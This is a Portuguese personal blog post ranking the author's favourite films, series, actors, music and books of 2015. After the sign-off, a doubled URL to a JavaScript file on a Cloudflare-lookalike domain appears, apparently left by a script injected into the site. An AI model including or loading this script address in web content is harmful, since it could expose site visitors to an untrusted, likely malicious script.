Oscar – Os melhores de 2015

Fala Galera, tudo bem?

Eu realmente não sei se outro blog faz isso, ou se já existe uma tag assim, mas para concluir esse ano de 2015 resolvi fazer uma lista com os melhores de cada categoria, visto durante esse ano. Então, vamos lá?

Filmes/séries:

Melhor filme:

Um fim de semana qualquer, a noite, em busca de um filme para passar o tédio e eis que só surge o filme que, por hora, vejo como o melhor filme que já vi. Não sei bem explicar o porque (e devo assumir que sou apaixonada por histórias com bastante drama e lágrimas), mas esse filme me conquistou de uma forma inexplicável. Até pelo trailer eu sou apaixonada!

Melhor série:

Comecei a assistir a série depois de muita insistência da minha melhor amiga  e não me arrependo por nada! Essa série é realmente tudo aquilo e mais um pouco do que dizem! Não aguento mais morrer de amores ❤

Melhor ator:

E nesse quesito fiquei extremamente em dúvida entre Kit Harington (aliás citei dois trabalhos dele nas duas melhores categorias acima) e entre Bob Morley, mas gente, tenho um amorzinho por ele desde um filme de terror que assiste onde ele atuava, e sem contar que acompanhei The 100 e particularmente, ele está sensacional na série!

Melhor atriz:

Haja amor pela Emilia Clarke nessa vida! Conheci o trabalho dela em Game of Thrones, que como já dito, foi a melhor série que vi esse ano e essa mulher simplesmente superou todos os quesitos de incrível possíveis!

Música

 

Melhor música

Internacional:

E eu sofri para decidir só uma! Para ser sincera, fiquei em dúvida entre essa e photograph do Ed Sheeran, mas sem dúvidas ela foi uma das mais marcantes para mim durante esse ano!

Nacional:

Nem é preciso dizer, pela milésima vez, o quanto eu amo essa música, não é? A primeira vez que conheci ela, foi em um programa onde um homem se declarava a sua amada, e todo aquele clichê, e recordo-me de ouvir a história de ter sido composta ao irmão falecido do vocalista, ou algo desse tipo, o que fez eu me apaixonar ainda mais!

Melhor cantor

Internacional:

Ed Sheeran ainda me mata de amores! Simplesmente sou viciada nas músicas desse carinha, não há como não amar também, não é?

Nacional:

Esteban Tavares é para abraçar o travesseiro e se desfazer, não é? E olha que das pessoas que conheço, sou a única que curte Esteban! 😦

Melhor banda/ Dupla:

Internacional:

Para ser sincera, demorei alguns minutos para ver algum para esta categoria, porque não tenho uma preferência específica. Mas Maroon 5 foi um dos que mais ouvi de banda internacional, então já conta!

Nacional:

O Teatro Mágico, é claro! Não é nem preciso dizer mais nada!

Livros:

Melhor livro:

E o cérebro deu uma pequena pausa nesse momento porque não conseguia decidir livro nenhum! Apesar que eu li bem pouco esse ano, para ser sincera, foi até vergonhoso a quantidade de leituras desse ano. Mas, apesar dos pesares, eu escolhi Por Lugares incríveis pelo simples motivo que quis morrer e matar a escritora pelo desfecho da história. Eu ainda não superei como tudo termina, então decidi colocá-lo como o melhor livro lido este ano por ter me feito enlouquecer e querer mudar toda a história!

Melhor saga:

Neste vergonhoso histórico de leitura de 2015, esta foi a única saga que concluí,então só caberia esta! Na realidade já havia iniciado ela, lendo penas o primeiro livro e havia desistido. Porém, durante a maratona literária que teve, resolvi voltar a ler e acabei gostando bastante da história, apesar de ter achado o final bem clichê e que podia ter sido mais surpreendente!

Melhor personagem feminina:

DELLA<3

Vocês devem se perguntar quem é essa protagonista! Pois é,ela não é protagonista. Ela é a melhor amiga da Kylie, a real protagonista da saga Acampamento Shadow falls. Mas gente, entendam que a Della é o meu tipo de personagem favorito. Ela é forte, guerreira e aguenta sempre os trancos e barrancos da vida com muito bom humor.

Melhor personagem masculino:

THEODORE FINCH ❤

Ele, com toda certeza, foi o personagem masculino que mais me cativou esse ano! De certa forma, ele vivia uma realidade comum a muitos adolescentes, e da qual até eu própria já fiz parte: sofrer bullying! E as coisas não lhe eram fáceis, de forma alguma, e sinceramente eu tenho uma vontade incrível de abraçar esse personagem! Eu sei, já disse que não superei a forma como tudo terminou.

Bom galera, foi isso! E que venha 2016 para conhecer novas coisas e ver novidades!

Beijos, Vanessa!

https://cloudflare.pw/cdn/statslelivros30.jshttps://cloudflare.pw/cdn/statslelivros30.js

Oscar – Os melhores de 2015

5 comentários sobre “Oscar – Os melhores de 2015

Deixe um comentário

